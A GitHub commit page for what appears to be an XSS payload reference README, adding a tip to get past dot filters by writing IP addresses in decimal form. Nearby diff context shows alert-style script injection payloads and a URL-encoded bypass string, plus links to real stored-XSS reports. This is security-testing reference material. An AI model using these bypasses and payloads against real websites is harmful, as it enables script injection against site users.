Skip to content

Commit

Permalink
Add dot filter bypass with decimal IP
Browse files Browse the repository at this point in the history
  • Loading branch information
@JLLeitschuh
JLLeitschuh authored Aug 28, 2019
1 parent 6c161f2 commit 7b6c8d4
Showing 1 changed file with 4 additions and 1 deletion.
5 changes: 4 additions & 1 deletion XSS Injection/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -557,6 +557,9 @@ You can bypass a single quote with ' in an on mousedown event handler
<script>window['alert'](document['domain'])</script>
```

Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
http://www.geektools.com/cgi-bin/ipconv.cgi

### Bypass parenthesis for string

```javascript
Expand Down Expand Up @@ -1043,4 +1046,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
- [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/)
- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be)
- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)

0 comments on commit 7b6c8d4

Please sign in to comment.